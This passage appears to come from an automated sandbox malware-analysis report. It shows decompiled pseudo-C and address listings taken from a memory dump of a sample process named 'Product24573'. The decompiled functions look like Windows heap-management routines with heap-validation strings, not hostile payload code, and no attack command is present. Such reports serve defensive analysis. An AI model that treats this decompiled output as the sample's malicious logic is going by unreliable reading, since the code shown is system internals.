								_t264[0] = _t264[0] ^ _t264[0] ^  *_t264;
								 *_t264 =  *_t264 ^ _t331[0x14];
							}
							_t326 =  *_t326;
							if( &(_t331[0x27]) == _t326) {
								goto L49;
							} else {
								_t281 = 0x81;
								continue;
							}
						}
						__eflags = _t331[0x13];
						if(_t331[0x13] != 0) {
							 *(_t326 + 0x1b) =  *(_t326 + 0x1a) ^  *(_t326 + 0x19) ^  *(_t326 + 0x18);
							 *(_t326 + 0x18) =  *(_t326 + 0x18) ^ _t331[0x14];
						}
						goto L65;
					}
				} else {
					L83:
					return _t267;
				}
			}



























































                                          0x011b44a1
                                          0x011b44a3
                                          0x011b44a7
                                          0x011b44ac
                                          0x011b44af
                                          0x011b44b2
                                          0x011b44b9
                                          0x011b44bc
                                          0x011b47f2
                                          0x011b47f2
                                          0x011b47f8
                                          0x011b47fc
                                          0x011b47fe
                                          0x011b4804
                                          0x011b4805
                                          0x011b4805
                                          0x011b480c
                                          0x011b4810
                                          0x011b4812
                                          0x011b4812
                                          0x011b4812
                                          0x011b4822
                                          0x011b4822
                                          0x011b4827
                                          0x011b4827
                                          0x00000000
                                          0x011b4827
                                          0x011b44c4
                                          0x011b44d3
                                          0x011b44d9
                                          0x011b44dc
                                          0x011b44de
                                          0x011b44e0
                                          0x011b4560
                                          0x011b4520
                                          0x011b4522
                                          0x011b4525
                                          0x011b4528
                                          0x011b452b
                                          0x011b452e
                                          0x011b4530
                                          0x011b4697
                                          0x011b469d
                                          0x011b46a1
                                          0x011b46c0
                                          0x011b46c5
                                          0x011b46a3
                                          0x011b46b8
                                          0x011b46bd
                                          0x011b46cb
                                          0x011b46d4
                                          0x011b4677
                                          0x011b4677
                                          0x011b4679
                                          0x011b467c
                                          0x011b468a
                                          0x011b4690
                                          0x011b4690
                                          0x011b47f1
                                          0x011b47f1
                                          0x011b47f1
                                          0x00000000
                                          0x011b47f1
                                          0x011b4536
                                          0x011b4539
                                          0x011b453c
                                          0x011b4636
                                          0x011b463c
                                          0x011b4640
                                          0x011b465f
                                          0x011b4664
                                          0x011b4642
                                          0x011b4657
                                          0x011b465c
                                          0x011b4670
                                          0x00000000
                                          0x011b4542
                                          0x011b4542
                                          0x011b4546
                                          0x011b4548
                                          0x011b454b
                                          0x011b4555
                                          0x011b455b
                                          0x011b455b
                                          0x011b455b
                                          0x011b455d
                                          0x011b455d
                                          0x011b455d
                                          0x00000000
                                          0x011b455d
                                          0x011b453c
                                          0x011b4579
                                          0x011b457c
                                          0x011b4587
                                          0x011b4589
                                          0x011b4591
                                          0x011b4592
                                          0x011b4597
                                          0x011b4598
                                          0x011b45a1
                                          0x011b45ab
                                          0x011b45ab
                                          0x011b45a1
                                          0x011b45ae
                                          0x011b45b4
                                          0x011b45b9
                                          0x011b45bd
                                          0x011b4759
                                          0x011b4759
                                          0x011b475f
                                          0x011b4761
                                          0x011b4763
                                          0x011b4765
                                          0x011b4768
                                          0x011b476b
                                          0x011b476d
                                          0x011b479c
                                          0x011b479c
                                          0x011b479f
                                          0x011b47a2
                                          0x011b47a4
                                          0x011b4830
                                          0x011b4833
                                          0x011b4879
                                          0x011b487d
                                          0x011b48f1
                                          0x011b48f3
                                          0x011b48f3
                                          0x00000000
                                          0x011b48f3
                                          0x011b487f
                                          0x011b4885
                                          0x011b4887
                                          0x011b48a8
                                          0x011b48a8
                                          0x011b48ae
                                          0x011b48b0
                                          0x011b48dc
                                          0x011b48dc
                                          0x011b48dc
                                          0x011b48dc
                                          0x011b48ec
                                          0x00000000
                                          0x011b48ec
                                          0x011b48b2
                                          0x011b48bc
                                          0x011b48be
                                          0x011b48c1
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x011b48c3
                                          0x011b48c3
                                          0x011b48c6
                                          0x011b48c9
                                          0x011b48cc
                                          0x011b48d1
                                          0x011b48d4
                                          0x00000000
                                          0x00000000
                                          0x011b48d6
                                          0x011b48d7
                                          0x011b48da
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x011b48da
                                          0x011b494f
                                          0x011b4955
                                          0x011b4959
                                          0x011b4978
                                          0x011b497d
                                          0x011b495b
                                          0x011b4970
                                          0x011b4975
                                          0x011b4986
                                          0x011b4987
                                          0x011b498a
                                          0x011b498d
                                          0x011b4997
                                          0x011b47ef
                                          0x011b47ef
                                          0x011b47ef
                                          0x00000000
                                          0x011b47ef
                                          0x011b4890
                                          0x011b4890
                                          0x011b4891
                                          0x011b4891
                                          0x011b4894
                                          0x011b4897
                                          0x011b489d
                                          0x011b48a0
                                          0x00000000
                                          0x00000000
                                          0x011b48a2
                                          0x011b48a3
                                          0x011b48a6
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x011b48a6
                                          0x011b48fb
                                          0x011b4901
                                          0x011b4905
                                          0x011b4924
                                          0x011b4929
                                          0x011b4907
                                          0x011b491c
                                          0x011b4921
                                          0x011b492f
                                          0x011b4935
                                          0x011b4936
                                          0x011b4939
                                          0x011b4942
                                          0x00000000
                                          0x011b4947
                                          0x011b4835
                                          0x011b483b
                                          0x011b483f
                                          0x011b485e
                                          0x011b4863
                                          0x011b4841
                                          0x011b4856
                                          0x011b485b
                                          0x011b4869
                                          0x011b486c
                                          0x011b486f
                                          0x011b47e7
                                          0x011b47e7
                                          0x00000000
                                          0x011b47ec
                                          0x011b47aa
                                          0x011b47b0
                                          0x011b47b4
                                          0x011b47d3
                                          0x011b47d8
                                          0x011b47b6
                                          0x011b47cb
                                          0x011b47d0
                                          0x011b47de
                                          0x011b47df
                                          0x011b47e2
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x011b476f
                                          0x011b476f
                                          0x011b4778
                                          0x011b4785
                                          0x011b4787
                                          0x011b478c
                                          0x011b478e
                                          0x00000000
                                          0x00000000
                                          0x011b4790
                                          0x011b4792
                                          0x011b4794
                                          0x00000000
                                          0x00000000
                                          0x011b4796
                                          0x011b4799
                                          0x00000000
                                          0x011b4799
                                          0x00000000
                                          0x011b45c3
                                          0x011b45c3
                                          0x011b45c7
                                          0x011b45c7
                                          0x011b45ca
                                          0x011b45cf
                                          0x011b45d3
                                          0x011b45df
                                          0x011b45e4
                                          0x011b45e6
                                          0x011b45e8
                                          0x011b45ed
                                          0x011b45ed
                                          0x011b45f2
                                          0x011b45f2
                                          0x011b45f7
                                          0x011b45fc
                                          0x011b4602
                                          0x011b4606
                                          0x011b4609
                                          0x011b460f
                                          0x011b46de
                                          0x011b46e3
                                          0x011b46e5
                                          0x011b46ec
                                          0x011b46ee
                                          0x011b46f6
                                          0x011b46f6
                                          0x011b46f6
                                          0x011b46f6
                                          0x011b46ec
                                          0x011b4615
                                          0x011b4615
                                          0x011b461d
                                          0x011b462e
                                          0x011b462e
                                          0x011b461d
                                          0x011b460f
                                          0x011b4609
                                          0x011b46fd
                                          0x00000000
                                          0x00000000
                                          0x011b4710
                                          0x011b471a
                                          0x011b4720
                                          0x011b4720
                                          0x011b4722
                                          0x011b472c
                                          0x00000000
                                          0x011b472e
                                          0x011b472e
                                          0x00000000
                                          0x011b472e
                                          0x011b472c
                                          0x011b4738
                                          0x011b473c
                                          0x011b474b
                                          0x011b4751
                                          0x011b4751
                                          0x00000000
                                          0x011b473c
                                          0x011b48f4
                                          0x011b48f4
                                          0x00000000
                                          0x011b48f4

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                          • API String ID: 0-1357697941
                                          • Opcode ID: 716ef285e792296928adc6d2e4aeef628a8043a495f4ee6b30dc9c119f912c2a
                                          • Instruction ID: 1be9db8af00f75c51467ec5fdc3d548a9fa697574b14e2e3c71773cb886c8e33
                                          • Opcode Fuzzy Hash: 716ef285e792296928adc6d2e4aeef628a8043a495f4ee6b30dc9c119f912c2a
                                          • Instruction Fuzzy Hash: A4F11231600646DFDB29DFA9C484BEABBF5FF49304F58C019E2869BA42D730A985CF51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0111A309 Relevance: 8.2, Strings: 6, Instructions: 687COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 72%
                                          			E0111A309(signed int __ecx, signed int __edx, signed int _a4, char _a8) {
				char _v8;
				signed short _v12;
				signed short _v16;
				signed int _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				unsigned int _v52;
				signed int _v56;
				void* _v60;
				intOrPtr _v64;
				void* _v72;
				void* __ebx;
				void* __edi;
				void* __ebp;
				unsigned int _t246;
				signed char _t247;
				signed short _t249;
				unsigned int _t256;
				signed int _t262;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				intOrPtr _t270;
				signed int _t280;
				signed int _t286;
				signed int _t289;
				intOrPtr _t290;
				signed int _t291;
				signed int _t317;
				signed short _t320;
				intOrPtr _t327;
				signed int _t339;
				signed int _t344;
				signed int _t347;
				intOrPtr _t348;
				signed int _t350;
				signed int _t352;
				signed int _t353;
				signed int _t356;
				intOrPtr _t357;
				intOrPtr _t366;
				signed int _t367;
				signed int _t370;
				intOrPtr _t371;
				signed int _t372;
				signed int _t394;
				signed short _t402;
				intOrPtr _t404;
				intOrPtr _t415;
				signed int _t430;
				signed int _t433;
				signed int _t437;
				signed int _t445;
				signed short _t446;
				signed short _t449;
				signed short _t452;
				signed int _t455;
				signed int _t460;
				signed short* _t468;
				signed int _t480;
				signed int _t481;
				signed int _t483;
				intOrPtr _t484;
				signed int _t491;
				unsigned int _t506;
				unsigned int _t508;
				signed int _t513;
				signed int _t514;
				signed int _t521;
				signed short* _t533;
				signed int _t541;
				signed int _t543;
				signed int _t546;
				unsigned int _t551;
				signed int _t553;

				_t450 = __ecx;
				_t553 = __ecx;
				_t539 = __edx;
				_v28 = 0;
				_v40 = 0;
				if(( *(__ecx + 0xcc) ^  *0x11e8a68) != 0) {
					_push(_a4);
					_t513 = __edx;
					L11:
					_t246 = E0111A830(_t450, _t513);
					L7:
					return _t246;
				}
				if(_a8 != 0) {
					__eflags =  *(__edx + 2) & 0x00000008;
					if(( *(__edx + 2) & 0x00000008) != 0) {
						 *((intOrPtr*)(__ecx + 0x230)) =  *((intOrPtr*)(__ecx + 0x230)) - 1;
						_t430 = E0111DF24(__edx,  &_v12,  &_v16);
						__eflags = _t430;
						if(_t430 != 0) {
							_t157 = _t553 + 0x234;
							 *_t157 =  *(_t553 + 0x234) - _v16;
							__eflags =  *_t157;
						}
					}
					_t445 = _a4;
					_t514 = _t539;
					_v48 = _t539;
					L14:
					_t247 =  *((intOrPtr*)(_t539 + 6));
					__eflags = _t247;
					if(_t247 == 0) {
						_t541 = _t553;
					} else {
						_t541 = (_t539 & 0xffff0000) - ((_t247 & 0x000000ff) << 0x10) + 0x10000;
						__eflags = _t541;
					}
					_t249 = 7 + _t445 * 8 + _t514;
					_v12 = _t249;
					__eflags =  *_t249 - 3;
					if( *_t249 == 3) {
						_v16 = _t514 + _t445 * 8 + 8;
						E010F9373(_t553, _t514 + _t445 * 8 + 8);
						_t452 = _v16;
						_v28 =  *(_t452 + 0x10);
						 *((intOrPtr*)(_t541 + 0x30)) =  *((intOrPtr*)(_t541 + 0x30)) - 1;
						_v36 =  *(_t452 + 0x14);
						 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) - ( *(_t452 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) +  *(_t452 + 0x14);
						 *((intOrPtr*)(_t553 + 0x1f8)) =  *((intOrPtr*)(_t553 + 0x1f8)) - 1;
						_t256 =  *(_t452 + 0x14);
						__eflags = _t256 - 0x7f000;
						if(_t256 >= 0x7f000) {
							_t142 = _t553 + 0x1ec;
							 *_t142 =  *(_t553 + 0x1ec) - _t256;
							__eflags =  *_t142;
							_t256 =  *(_t452 + 0x14);
						}
						_t513 = _v48;
						_t445 = _t445 + (_t256 >> 3) + 0x20;
						_a4 = _t445;
						_v40 = 1;
					} else {
						_t27 =  &_v36;
						 *_t27 = _v36 & 0x00000000;
						__eflags =  *_t27;
					}
					__eflags =  *((intOrPtr*)(_t553 + 0x54)) -  *((intOrPtr*)(_t513 + 4));
					if( *((intOrPtr*)(_t553 + 0x54)) ==  *((intOrPtr*)(_t513 + 4))) {
						_v44 = _t513;
						_t262 = E010FA9EF(_t541, _t513);
						__eflags = _a8;
						_v32 = _t262;
						if(_a8 != 0) {
							__eflags = _t262;
							if(_t262 == 0) {
								goto L19;
							}
						}
						__eflags =  *0x11e8748 - 1;
						if( *0x11e8748 >= 1) {
							__eflags = _t262;
							if(_t262 == 0) {
								_t415 =  *[fs:0x30];
								__eflags =  *(_t415 + 0xc);
								if( *(_t415 + 0xc) == 0) {
									_push("HEAP: ");
									E010FB150();
								} else {
									E010FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push("(UCRBlock != NULL)");
								E010FB150();
								__eflags =  *0x11e7bc8;
								if( *0x11e7bc8 == 0) {
									__eflags = 1;
									E011B2073(_t445, 1, _t541, 1);
								}
								_t513 = _v48;
								_t445 = _a4;
							}
						}
						_t350 = _v40;
						_t480 = _t445 << 3;
						_v20 = _t480;
						_t481 = _t480 + _t513;
						_v24 = _t481;
						__eflags = _t350;
						if(_t350 == 0) {
							_t481 = _t481 + 0xfffffff0;
							__eflags = _t481;
						}
						_t483 = (_t481 & 0xfffff000) - _v44;
						__eflags = _t483;
						_v52 = _t483;
						if(_t483 == 0) {
							__eflags =  *0x11e8748 - 1;
							if( *0x11e8748 < 1) {
								goto L9;
							}
							__eflags = _t350;
							goto L146;
						} else {
							_t352 = E0112174B( &_v44,  &_v52, 0x4000);
							__eflags = _t352;
							if(_t352 < 0) {
								goto L94;
							}
							_t353 = E01117D50();
							_t447 = 0x7ffe0380;
							__eflags = _t353;
							if(_t353 != 0) {
								_t356 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t356 = 0x7ffe0380;
							}
							__eflags =  *_t356;
							if( *_t356 != 0) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0x240) & 0x00000001;
								if(( *(_t357 + 0x240) & 0x00000001) != 0) {
									E011B14FB(_t447, _t553, _v44, _v52, 5);
								}
							}
							_t358 = _v32;
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t484 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t484 - 0x7f000;
							if(_t484 >= 0x7f000) {
								_t90 = _t553 + 0x1ec;
								 *_t90 =  *(_t553 + 0x1ec) - _t484;
								__eflags =  *_t90;
							}
							E010F9373(_t553, _t358);
							_t486 = _v32;
							 *((intOrPtr*)(_v32 + 0x14)) =  *((intOrPtr*)(_v32 + 0x14)) + _v52;
							E010F9819(_t486);
							 *((intOrPtr*)(_t541 + 0x2c)) =  *((intOrPtr*)(_t541 + 0x2c)) + (_v52 >> 0xc);
							 *((intOrPtr*)(_t553 + 0x1e8)) =  *((intOrPtr*)(_t553 + 0x1e8)) - _v52;
							_t366 =  *((intOrPtr*)(_v32 + 0x14));
							__eflags = _t366 - 0x7f000;
							if(_t366 >= 0x7f000) {
								_t104 = _t553 + 0x1ec;
								 *_t104 =  *(_t553 + 0x1ec) + _t366;
								__eflags =  *_t104;
							}
							__eflags = _v40;
							if(_v40 == 0) {
								_t533 = _v52 + _v44;
								_v32 = _t533;
								_t533[2] =  *((intOrPtr*)(_t553 + 0x54));
								__eflags = _v24 - _v52 + _v44;
								if(_v24 == _v52 + _v44) {
									__eflags =  *(_t553 + 0x4c);
									if( *(_t553 + 0x4c) != 0) {
										_t533[1] = _t533[1] ^ _t533[0] ^  *_t533;
										 *_t533 =  *_t533 ^  *(_t553 + 0x50);
									}
								} else {
									_t449 = 0;
									_t533[3] = 0;
									_t533[1] = 0;
									_t394 = _v20 - _v52 >> 0x00000003 & 0x0000ffff;
									_t491 = _t394;
									 *_t533 = _t394;
									__eflags =  *0x11e8748 - 1; // 0x0
									if(__eflags >= 0) {
										__eflags = _t491 - 1;
										if(_t491 <= 1) {
											_t404 =  *[fs:0x30];
											__eflags =  *(_t404 + 0xc);
											if( *(_t404 + 0xc) == 0) {
												_push("HEAP: ");
												E010FB150();
											} else {
												E010FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
											}
											_push("((LONG)FreeEntry->Size > 1)");
											E010FB150();
											_pop(_t491);
											__eflags =  *0x11e7bc8 - _t449; // 0x0
											if(__eflags == 0) {
												__eflags = 0;
												_t491 = 1;
												E011B2073(_t449, 1, _t541, 0);
											}
											_t533 = _v32;
										}
									}
									_t533[1] = _t449;
									__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
									if( *((intOrPtr*)(_t541 + 0x18)) != _t541) {
										_t402 = (_t533 - _t541 >> 0x10) + 1;
										_v16 = _t402;
										__eflags = _t402 - 0xfe;
										if(_t402 >= 0xfe) {
											_push(_t491);
											_push(_t449);
											E011BA80D( *((intOrPtr*)(_t541 + 0x18)), 3, _t533, _t541);
											_t533 = _v48;
											_t402 = _v32;
										}
										_t449 = _t402;
									}
									_t533[3] = _t449;
									E0111A830(_t553, _t533,  *_t533 & 0x0000ffff);
									_t447 = 0x7ffe0380;
								}
							}
							_t367 = E01117D50();
							__eflags = _t367;
							if(_t367 != 0) {
								_t370 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t370 = _t447;
							}
							__eflags =  *_t370;
							if( *_t370 != 0) {
								_t371 =  *[fs:0x30];
								__eflags =  *(_t371 + 0x240) & 1;
								if(( *(_t371 + 0x240) & 1) != 0) {
									__eflags = E01117D50();
									if(__eflags != 0) {
										_t447 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									E011B1411(_t447, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _v40, _v36,  *_t447 & 0x000000ff);
								}
							}
							_t372 = E01117D50();
							_t546 = 0x7ffe038a;
							_t446 = 0x230;
							__eflags = _t372;
							if(_t372 != 0) {
								_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
							} else {
								_t246 = 0x7ffe038a;
							}
							__eflags =  *_t246;
							if( *_t246 == 0) {
								goto L7;
							} else {
								__eflags = E01117D50();
								if(__eflags != 0) {
									_t546 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + _t446;
									__eflags = _t546;
								}
								_push( *_t546 & 0x000000ff);
								_push(_v36);
								_push(_v40);
								goto L120;
							}
						}
					} else {
						L19:
						_t31 = _t513 + 0x101f; // 0x101f
						_t455 = _t31 & 0xfffff000;
						_t32 = _t513 + 0x28; // 0x28
						_v44 = _t455;
						__eflags = _t455 - _t32;
						if(_t455 == _t32) {
							_t455 = _t455 + 0x1000;
							_v44 = _t455;
						}
						_t265 = _t445 << 3;
						_v24 = _t265;
						_t266 = _t265 + _t513;
						__eflags = _v40;
						_v20 = _t266;
						if(_v40 == 0) {
							_t266 = _t266 + 0xfffffff0;
							__eflags = _t266;
						}
						_t267 = _t266 & 0xfffff000;
						_v52 = _t267;
						__eflags = _t267 - _t455;
						if(_t267 < _t455) {
							__eflags =  *0x11e8748 - 1; // 0x0
							if(__eflags < 0) {
								L9:
								_t450 = _t553;
								L10:
								_push(_t445);
								goto L11;
							}
							__eflags = _v40;
							L146:
							if(__eflags == 0) {
								goto L9;
							}
							_t270 =  *[fs:0x30];
							__eflags =  *(_t270 + 0xc);
							if( *(_t270 + 0xc) == 0) {
								_push("HEAP: ");
								E010FB150();
							} else {
								E010FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push("(!TrailingUCR)");
							E010FB150();
							__eflags =  *0x11e7bc8;
							if( *0x11e7bc8 == 0) {
								__eflags = 0;
								E011B2073(_t445, 1, _t541, 0);
							}
							L152:
							_t445 = _a4;
							L153:
							_t513 = _v48;
							goto L9;
						}
						_v32 = _t267;
						_t280 = _t267 - _t455;
						_v32 = _v32 - _t455;
						__eflags = _a8;
						_t460 = _v32;
						_v52 = _t460;
						if(_a8 != 0) {
							L27:
							__eflags = _t280;
							if(_t280 == 0) {
								L33:
								_t446 = 0;
								__eflags = _v40;
								if(_v40 == 0) {
									_t468 = _v44 + _v52;
									_v36 = _t468;
									_t468[2] =  *((intOrPtr*)(_t553 + 0x54));
									__eflags = _v20 - _v52 + _v44;
									if(_v20 == _v52 + _v44) {
										__eflags =  *(_t553 + 0x4c);
										if( *(_t553 + 0x4c) != 0) {
											_t468[1] = _t468[1] ^ _t468[0] ^  *_t468;
											 *_t468 =  *_t468 ^  *(_t553 + 0x50);
										}
									} else {
										_t468[3] = 0;
										_t468[1] = 0;
										_t317 = _v24 - _v52 - _v44 + _t513 >> 0x00000003 & 0x0000ffff;
										_t521 = _t317;
										 *_t468 = _t317;
										__eflags =  *0x11e8748 - 1; // 0x0
										if(__eflags >= 0) {
											__eflags = _t521 - 1;
											if(_t521 <= 1) {
												_t327 =  *[fs:0x30];
												__eflags =  *(_t327 + 0xc);
												if( *(_t327 + 0xc) == 0) {
													_push("HEAP: ");
													E010FB150();
												} else {
													E010FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
												}
												_push("(LONG)FreeEntry->Size > 1");
												E010FB150();
												__eflags =  *0x11e7bc8 - _t446; // 0x0
												if(__eflags == 0) {
													__eflags = 1;
													E011B2073(_t446, 1, _t541, 1);
												}
												_t468 = _v36;
											}
										}
										_t468[1] = _t446;
										_t522 =  *((intOrPtr*)(_t541 + 0x18));
										__eflags =  *((intOrPtr*)(_t541 + 0x18)) - _t541;
										if( *((intOrPtr*)(_t541 + 0x18)) == _t541) {
											_t320 = _t446;
										} else {
											_t320 = (_t468 - _t541 >> 0x10) + 1;
											_v12 = _t320;
											__eflags = _t320 - 0xfe;
											if(_t320 >= 0xfe) {
												_push(_t468);
												_push(_t446);
												E011BA80D(_t522, 3, _t468, _t541);
												_t468 = _v52;
												_t320 = _v28;
											}
										}
										_t468[3] = _t320;
										E0111A830(_t553, _t468,  *_t468 & 0x0000ffff);
									}
								}
								E0111B73D(_t553, _t541, _v44 + 0xffffffe8, _v52, _v48,  &_v8);
								E0111A830(_t553, _v64, _v24);
								_t286 = E01117D50();
								_t542 = 0x7ffe0380;
								__eflags = _t286;
								if(_t286 != 0) {
									_t289 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								} else {
									_t289 = 0x7ffe0380;
								}
								__eflags =  *_t289;
								if( *_t289 != 0) {
									_t290 =  *[fs:0x30];
									__eflags =  *(_t290 + 0x240) & 1;
									if(( *(_t290 + 0x240) & 1) != 0) {
										__eflags = E01117D50();
										if(__eflags != 0) {
											_t542 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
											__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
										}
										E011B1411(_t446, _t553, _v44, __eflags, _v52,  *(_t553 + 0x74) << 3, _t446, _t446,  *_t542 & 0x000000ff);
									}
								}
								_t291 = E01117D50();
								_t543 = 0x7ffe038a;
								__eflags = _t291;
								if(_t291 != 0) {
									_t246 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
								} else {
									_t246 = 0x7ffe038a;
								}
								__eflags =  *_t246;
								if( *_t246 != 0) {
									__eflags = E01117D50();
									if(__eflags != 0) {
										_t543 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
										__eflags = _t543;
									}
									_push( *_t543 & 0x000000ff);
									_push(_t446);
									_push(_t446);
									L120:
									_push( *(_t553 + 0x74) << 3);
									_push(_v52);
									_t246 = E011B1411(_t446, _t553, _v44, __eflags);
								}
								goto L7;
							}
							 *((intOrPtr*)(_t553 + 0x200)) =  *((intOrPtr*)(_t553 + 0x200)) + 1;
							_t339 = E0112174B( &_v44,  &_v52, 0x4000);
							__eflags = _t339;
							if(_t339 < 0) {
								L94:
								 *((intOrPtr*)(_t553 + 0x210)) =  *((intOrPtr*)(_t553 + 0x210)) + 1;
								__eflags = _v40;
								if(_v40 == 0) {
									goto L153;
								}
								E0111B73D(_t553, _t541, _v28 + 0xffffffe8, _v36, _v48,  &_a4);
								goto L152;
							}
							_t344 = E01117D50();
							__eflags = _t344;
							if(_t344 != 0) {
								_t347 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							} else {
								_t347 = 0x7ffe0380;
							}
							__eflags =  *_t347;
							if( *_t347 != 0) {
								_t348 =  *[fs:0x30];
								__eflags =  *(_t348 + 0x240) & 1;
								if(( *(_t348 + 0x240) & 1) != 0) {
									E011B14FB(_t445, _t553, _v44, _v52, 6);
								}
							}
							_t513 = _v48;
							goto L33;
						}
						__eflags =  *_v12 - 3;
						_t513 = _v48;
						if( *_v12 == 3) {
							goto L27;
						}
						__eflags = _t460;
						if(_t460 == 0) {
							goto L9;
						}
						__eflags = _t460 -  *((intOrPtr*)(_t553 + 0x6c));
						if(_t460 <  *((intOrPtr*)(_t553 + 0x6c))) {
							goto L9;
						}
						goto L27;
					}
				}
				_t445 = _a4;
				if(_t445 <  *((intOrPtr*)(__ecx + 0x6c))) {
					_t513 = __edx;
					goto L10;
				}
				_t433 =  *((intOrPtr*)(__ecx + 0x74)) + _t445;
				_v20 = _t433;
				if(_t433 <  *((intOrPtr*)(__ecx + 0x70)) || _v20 <  *(__ecx + 0x1e8) >>  *((intOrPtr*)(__ecx + 0x240)) + 3) {
					_t513 = _t539;
					goto L9;
				} else {
					_t437 = E011199BF(__ecx, __edx,  &_a4, 0);
					_t445 = _a4;
					_t514 = _t437;
					_v56 = _t514;
					if(_t445 - 0x201 > 0xfbff) {
						goto L14;
					} else {
						E0111A830(__ecx, _t514, _t445);
						_t506 =  *(_t553 + 0x238);
						_t551 =  *((intOrPtr*)(_t553 + 0x1e8)) - ( *(_t553 + 0x74) << 3);
						_t246 = _t506 >> 4;
						if(_t551 < _t506 - _t246) {
							_t508 =  *(_t553 + 0x23c);
							_t246 = _t508 >> 2;
							__eflags = _t551 - _t508 - _t246;
							if(_t551 > _t508 - _t246) {
								_t246 = E0112ABD8(_t553);
								 *(_t553 + 0x23c) = _t551;
								 *(_t553 + 0x238) = _t551;
							}
						}
						goto L7;
					}
				}
			}



















































































                                          0x0111a309
                                          0x0111a316
                                          0x0111a319
                                          0x0111a31d
                                          0x0111a32d
                                          0x0111a331
                                          0x01161e0d
                                          0x01161e10
                                          0x0111a3cb
                                          0x0111a3cb
                                          0x0111a3bd
                                          0x0111a3c3
                                          0x0111a3c3
                                          0x0111a33a
                                          0x01161e17
                                          0x01161e1b
                                          0x01161e1d
                                          0x01161e2f
                                          0x01161e34
                                          0x01161e36
                                          0x01161e3c
                                          0x01161e3c
                                          0x01161e3c
                                          0x01161e3c
                                          0x01161e36
                                          0x01161e42
                                          0x01161e45
                                          0x01161e47
                                          0x0111a3f8
                                          0x0111a3f8
                                          0x0111a3fb
                                          0x0111a3fd
                                          0x01161e50
                                          0x0111a403
                                          0x0111a411
                                          0x0111a411
                                          0x0111a411
                                          0x0111a41e
                                          0x0111a420
                                          0x0111a424
                                          0x0111a427
                                          0x0111a7c9
                                          0x0111a7cd
                                          0x0111a7d2
                                          0x0111a7d9
                                          0x0111a7e0
                                          0x0111a7e3
                                          0x0111a7ed
                                          0x0111a7f3
                                          0x0111a7f9
                                          0x0111a7ff
                                          0x0111a802
                                          0x0111a807
                                          0x0111a809
                                          0x0111a809
                                          0x0111a809
                                          0x0111a80f
                                          0x0111a80f
                                          0x0111a812
                                          0x0111a81c
                                          0x0111a821
                                          0x0111a824
                                          0x0111a42d
                                          0x0111a42d
                                          0x0111a42d
                                          0x0111a42d
                                          0x0111a42d
                                          0x0111a436
                                          0x0111a43a
                                          0x0111a609
                                          0x0111a60d
                                          0x0111a612
                                          0x0111a616
                                          0x0111a61a
                                          0x01161e57
                                          0x01161e59
                                          0x00000000
                                          0x00000000
                                          0x01161e5f
                                          0x0111a620
                                          0x0111a627
                                          0x01161e64
                                          0x01161e66
                                          0x01161e6c
                                          0x01161e72
                                          0x01161e76
                                          0x01161e95
                                          0x01161e9a
                                          0x01161e78
                                          0x01161e8d
                                          0x01161e92
                                          0x01161ea0
                                          0x01161ea5
                                          0x01161eaa
                                          0x01161eb2
                                          0x01161eb6
                                          0x01161eb9
                                          0x01161eb9
                                          0x01161ebe
                                          0x01161ec2
                                          0x01161ec2
                                          0x01161e66
                                          0x0111a62d
                                          0x0111a633
                                          0x0111a636
                                          0x0111a63a
                                          0x0111a63c
                                          0x0111a640
                                          0x0111a642
                                          0x0111a644
                                          0x0111a644
                                          0x0111a644
                                          0x0111a64d
                                          0x0111a64d
                                          0x0111a651
